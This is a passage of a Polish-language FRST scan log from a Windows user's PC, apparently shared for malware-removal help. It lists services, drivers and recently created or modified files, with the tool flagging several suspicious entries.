S2 Ntp2UpSvc; C:\Program Files (x86)\Common Files\ntp2UpSvc\notepad2.exe [2340864 2017-02-16] (Don HO don.h@free.fr) [Brak podpisu cyfrowego]
S3 Panda VPN Service; C:\Program Files (x86)\Panda Security\Panda Security Protection\Hydra.Sdk.Windows.Service.exe [320848 2017-11-20] (AnchorFree Inc -> )
R2 PandaAgent; C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe [84176 2019-02-19] (Panda Security S.L. -> Panda Security, S.L.)
R2 PSUAService; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe [48784 2019-10-16] (Panda Security S.L. -> Panda Security, S.L.)
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [338944 2013-08-11] (IDT, Inc.) [Brak podpisu cyfrowego]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Brak podpisu cyfrowego]
S2 Themes; C:\Windows\system32\themeservice.dll [59392 2014-10-29] (Microsoft Windows -> Microsoft Corporation) [DependOnService: iThemes5]<==== UWAGA
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WpSvc; c:\users\byaku\appdata\roaming\360bizhi\lpi\WpSvc.dll [253352 2016-11-17] (Qihoo 360 Software (Beijing) Company Limited -> )
S3 ekrnEpfw; "C:\Program Files\ESET\ESET Smart Security\ekrn.exe" [X]
S2 Update Mgr RollAround; "C:\Program Files (x86)\Common Files\2a617352-d396-46a3-a71b-5d89535356cf\updater.exe" [X] <==== UWAGA

===================== Sterowniki (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

S3 AthDfu; C:\Windows\System32\Drivers\AthDfu.sys [55448 2013-08-29] (Atheros Communications Inc. -> Windows (R) Win 7 DDK provider)
R3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [132920 2013-03-25] (Motorola Solutions Inc. -> Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1366328 2013-03-28] (Motorola Solutions Inc. -> Motorola Solutions, Inc.)
S3 lehidmini; C:\Windows\System32\drivers\leath_hid.sys [39704 2013-08-29] (Atheros Communications Inc. -> Atheros)
R1 NNSALPC; C:\Windows\System32\DRIVERS\NNSAlpc.sys [111456 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSDNS; C:\Windows\System32\DRIVERS\NNSDns.sys [104728 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSHTTP; C:\Windows\System32\DRIVERS\NNSHttp.sys [212360 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSHTTPS; C:\Windows\System32\DRIVERS\NNSHttps.sys [125864 2019-03-06] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSIDS; C:\Windows\System32\DRIVERS\NNSIds.sys [133056 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSNAHSL; C:\Windows\system32\DRIVERS\NNSNAHSL.sys [95472 2018-07-16] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSPICC; C:\Windows\System32\DRIVERS\NNSPicc.sys [150048 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSPIHSW; C:\Windows\System32\DRIVERS\NNSPihsw.sys [94976 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSPOP3; C:\Windows\System32\DRIVERS\NNSPop3.sys [135640 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSPROT; C:\Windows\System32\DRIVERS\NNSProt.sys [347832 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSPRV; C:\Windows\System32\DRIVERS\NNSPrv.sys [291664 2019-05-30] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSSMTP; C:\Windows\System32\DRIVERS\NNSSmtp.sys [123304 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSSTRM; C:\Windows\System32\DRIVERS\NNSStrm.sys [296320 2019-05-30] (Panda Security S.L. -> Panda Security, S.L.)
R1 NNSTLSC; C:\Windows\System32\DRIVERS\NNSTlsc.sys [132544 2019-03-05] (Panda Security S.L. -> Panda Security, S.L.)
R2 PSINAflt; C:\Windows\System32\DRIVERS\PSINAflt.sys [197720 2019-06-06] (Panda Security S.L. -> Panda Security, S.L.)
R2 PSINFile; C:\Windows\System32\DRIVERS\PSINFile.sys [159832 2019-06-04] (Panda Security S.L. -> Panda Security, S.L.)
R1 PSINKNC; C:\Windows\System32\DRIVERS\psinknc.sys [214616 2019-03-04] (Panda Security S.L. -> Panda Security, S.L.)
R2 PSINProc; C:\Windows\System32\DRIVERS\PSINProc.sys [146520 2019-06-04] (Panda Security S.L. -> Panda Security, S.L.)
R2 PSINProt; C:\Windows\System32\DRIVERS\PSINProt.sys [158808 2019-06-06] (Panda Security S.L. -> Panda Security, S.L.)
R2 PSINReg; C:\Windows\System32\DRIVERS\PSINReg.sys [128600 2019-06-04] (Panda Security S.L. -> Panda Security, S.L.)
R3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [72280 2017-05-22] (Panda Security S.L. -> Panda Security, S.L.)
R3 STHDA; C:\Windows\system32\DRIVERS\stwrt64.sys [551936 2013-08-11] (Microsoft Windows Hardware Compatibility Publisher -> IDT, Inc.)
S3 ucdrv; C:\Windows\System32\drivers:ucdrv-x64.sys [0 0000-00-00] (UC Web Inc.) <==== UWAGA (zerobajtowy plik/folder) <==== UWAGA
R3 vmulti; C:\Windows\System32\drivers\vmulti.sys [10752 2018-12-11] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S1 chhvdfnv; \??\C:\Windows\system32\drivers\chhvdfnv.sys [X]
S2 ComputerZLock; \??\C:\Program Files (x86)\LdsLite\ComputerZLock_x64.sys [X]
S3 ComputerZ_x64; \??\C:\Program Files (x86)\LdsLite\ComputerZ_x64.sys [X]
U2 CWASRE; Brak ImagePath
U2 glory; Brak ImagePath
S3 moufiltr; \SystemRoot\System32\drivers\moufiltr.sys [X]
S1 mwescontroller; system32\drivers\mwescontroller.sys [X] <==== UWAGA
S1 p1483448096am; \??\C:\Users\Byaku\AppData\Local\Temp\bk5470.tmp\p1483448096am.sys [X] <==== UWAGA
S1 p1484835112am; \??\C:\Users\Byaku\AppData\Local\Temp\bkEDAE.tmp\p1484835112am.sys [X] <==== UWAGA
S1 p1484835200am; \??\C:\Users\Byaku\AppData\Local\Temp\bk4138.tmp\p1484835200am.sys [X] <==== UWAGA
S1 p1486202128am; \??\C:\Users\Byaku\AppData\Local\Temp\bkC03A.tmp\p1486202128am.sys [X] <==== UWAGA
S1 p1486561471am; \??\C:\Users\Byaku\AppData\Local\Temp\bk6057.tmp\p1486561471am.sys [X] <==== UWAGA
S1 p1487606898am; \??\C:\Users\Byaku\AppData\Local\Temp\bkA65A.tmp\p1487606898am.sys [X] <==== UWAGA
S1 p1487607019am; \??\C:\Users\Byaku\AppData\Local\Temp\bk89FF.tmp\p1487607019am.sys [X] <==== UWAGA
U2 snare; Brak ImagePath
S3 vhidmini; \SystemRoot\System32\drivers\walvhid.sys [X]
U2 WinSnare; Brak ImagePath
S1 xuffnqgq; \??\C:\Windows\system32\drivers\xuffnqgq.sys [X]

==================== NetSvcs (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

NETSVCx32: HpSvc -> Brak ścieżki do pliku.
NETSVCx32: GmSvc -> Brak ścieżki do pliku.
NETSVCx32: WpSvc -> C:\users\byaku\appdata\roaming\360bizhi\lpi\WpSvc.dll ()

==================== Jeden miesiąc (utworzone) (Wszystkie) =========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2021-01-17 13:53 - 2021-01-17 13:58 - 000033535 _____ C:\Users\Byaku\Downloads\FRST.txt
2021-01-17 13:52 - 2021-01-17 13:55 - 000000000 ____D C:\FRST
2021-01-17 13:49 - 2021-01-17 13:50 - 002295296 _____ (Farbar) C:\Users\Byaku\Downloads\FRST64.exe
2021-01-17 13:25 - 2021-01-17 13:25 - 000000000 ____D C:\Users\Byaku\Downloads\ComIntRep_5003
2021-01-14 21:55 - 2021-01-14 21:55 - 003001755 _____ C:\Users\Byaku\Downloads\James Patterson Howard Roughan - Instinct 01 - Instinct retail epub.epub
2021-01-12 15:57 - 2021-01-12 15:57 - 000098663 _____ C:\Users\Byaku\Downloads\rozliczenie roczne 2020 ZUS.pdf
2021-01-11 15:47 - 2021-01-11 15:47 - 000072602 _____ C:\Users\Byaku\Downloads\FS 4_01_2021.pdf
2020-12-29 17:01 - 2020-12-29 17:08 - 000000000 ____D C:\Users\Byaku\AppData\Roaming\Pentablet
2020-12-29 17:01 - 2020-12-29 17:01 - 000000843 _____ C:\Users\Public\Desktop\Pentablet.lnk
2020-12-29 17:01 - 2020-12-29 17:01 - 000000843 _____ C:\ProgramData\Desktop\Pentablet.lnk
2020-12-29 17:01 - 2020-12-29 17:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pentablet
2020-12-29 17:01 - 2019-07-11 13:50 - 000145408 _____ (TODO: <公司名>) C:\Windows\system32\WinTab32.dll
2020-12-29 17:01 - 2019-07-11 13:50 - 000124928 _____ (TODO: <公司名>) C:\Windows\SysWOW64\WinTab32.dll
2020-12-29 17:01 - 2018-12-11 10:03 - 000010752 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\vmulti.sys
2020-12-29 17:01 - 2014-09-17 10:47 - 000007680 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\hidkmdf.sys
2020-12-29 17:00 - 2020-12-29 17:01 - 000000000 ____D C:\Program Files\Pentablet
2020-12-29 16:57 - 2020-12-29 16:57 - 000000000 ____D C:\Users\Byaku\Downloads\XP-PenWin_1.6.4.200810

==================== Jeden miesiąc (zmodyfikowane) ==================

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2021-01-17 09:07 - 2013-11-26 15:08 - 001817498 _____ C:\Windows\system32\PerfStringBackup.INI
2021-01-17 09:07 - 2013-08-23 00:12 - 000801022 _____ C:\Windows\system32\perfh015.dat
2021-01-17 09:07 - 2013-08-23 00:12 - 000160728 _____ C:\Windows\system32\perfc015.dat
2021-01-17 09:07 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf
2021-01-17 09:06 - 2019-10-03 13:31 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2021-01-17 09:06 - 2019-10-03 13:31 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2021-01-17 09:04 - 2016-12-11 12:51 - 000000000 ____D C:\Users\Byaku\AppData\Roaming\Ludashi
2021-01-17 09:02 - 2016-01-22 01:31 - 000000000 ___RD C:\Users\Byaku\Creative Cloud Files
2021-01-17 09:00 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-01-16 12:32 - 2016-05-08 21:42 - 000000000 ____D C:\Users\Byaku\Documents\Biblioteka calibre
2021-01-13 22:41 - 2015-05-04 19:37 - 000000000 ____D C:\Users\Byaku\Downloads\Ebooki
2021-01-13 22:40 - 2018-02-15 22:18 - 000000000 ____D C:\Users\Byaku\Downloads\Ebooki MM do przejrzenia
2021-01-13 10:30 - 2020-06-22 22:16 - 001381693 _____ C:\Users\Byaku\Desktop\gold moon.ai
2021-01-09 10:33 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\system32\NDF
2021-01-02
12:41 - 2016-03-08 15:10 - 000000000 ____D C:\Users\Byaku\Desktop\Mangi na sprzedaż 2020-12-29 17:05 - 2015-03-03 18:23 - 000003598 _____ C:\Windows\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2709180964-3026329352-173763364-1001 2020-12-29 17:01 - 2015-03-03 18:17 - 000000000 ____D C:\Users\Byaku\AppData\Roaming\Adobe 2020-12-29 16:53 - 2013-11-27 08:35 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2020-12-29 16:53 - 2013-08-22 14:36 - 000000000 ____D C:\Windows 2020-12-29 14:56 - 2013-08-22 14:25 - 000000384 _____ C:\Windows\win.ini 2020-12-26 23:36 - 2015-03-06 23:06 - 000000000 ____D C:\Users\Byaku\AppData\Roaming\vlc ==================== Pliki w katalogu głównym wybranych folderów ======== 2015-10-30 01:18 - 2015-10-30 01:18 - 000000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat 2020-06-26 14:46 - 2020-06-26 14:46 - 000000115 _____ () C:\Users\Byaku\haslo..vbs 2017-03-02 15:55 - 2017-05-10 13:21 - 000130650 _____ () C:\Program Files (x86)\metadata 2017-03-02 15:55 - 2017-05-10 13:20 - 000000040 _____ () C:\Program Files (x86)\settings.dat 2016-01-29 19:39 - 2016-01-30 21:53 - 000000132 _____ () C:\Users\Byaku\AppData\Roaming\Adobe PNG Format CS6 Prefs 2016-12-11 13:31 - 2016-12-11 13:31 - 007310848 _____ () C:\Users\Byaku\AppData\Roaming\agent.dat 2016-12-11 13:31 - 2016-12-11 13:31 - 000070704 _____ () C:\Users\Byaku\AppData\Roaming\Config.xml 2016-12-11 13:30 - 2016-12-11 13:29 - 000684544 _____ () C:\Users\Byaku\AppData\Roaming\Danhold.exe 2016-12-11 13:31 - 2016-12-11 13:31 - 001907144 _____ () C:\Users\Byaku\AppData\Roaming\Danhold.tst 2016-12-11 13:29 - 2016-12-11 13:29 - 000018144 _____ () C:\Users\Byaku\AppData\Roaming\InstallationConfiguration.xml 2016-12-11 13:29 - 2016-12-11 13:29 - 000140288 _____ () C:\Users\Byaku\AppData\Roaming\Installer.dat 2016-12-11 13:31 - 2016-12-11 13:31 - 000018432 _____ () C:\Users\Byaku\AppData\Roaming\Main.dat 2016-12-11 13:31 - 2016-12-11 13:31 - 
000005568 _____ () C:\Users\Byaku\AppData\Roaming\md.xml 2016-12-11 13:31 - 2016-12-11 13:31 - 000126464 _____ () C:\Users\Byaku\AppData\Roaming\noah.dat 2016-12-11 13:31 - 2016-12-11 13:31 - 000032038 _____ () C:\Users\Byaku\AppData\Roaming\uninstall_temp.ico 2015-05-25 10:37 - 2015-07-15 23:37 - 000000096 _____ () C:\Users\Byaku\AppData\Roaming\WB.CFG 2018-09-29 07:06 - 2018-09-29 07:06 - 000000000 _____ () C:\Users\Byaku\AppData\Local\oobelibMkey.log 2019-10-07 22:46 - 2019-10-07 22:46 - 000000218 _____ () C:\Users\Byaku\AppData\Local\recently-used.xbel 2017-05-11 14:35 - 2017-05-11 14:35 - 000000000 _____ () C:\Users\Byaku\AppData\Local\{FAD5A184-C57E-478A-8159-3C7E25BC5F96} ==================== SigCheck ============================ (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) LastRegBack: 2020-08-23 09:10 ==================== Koniec FRST.txt ========================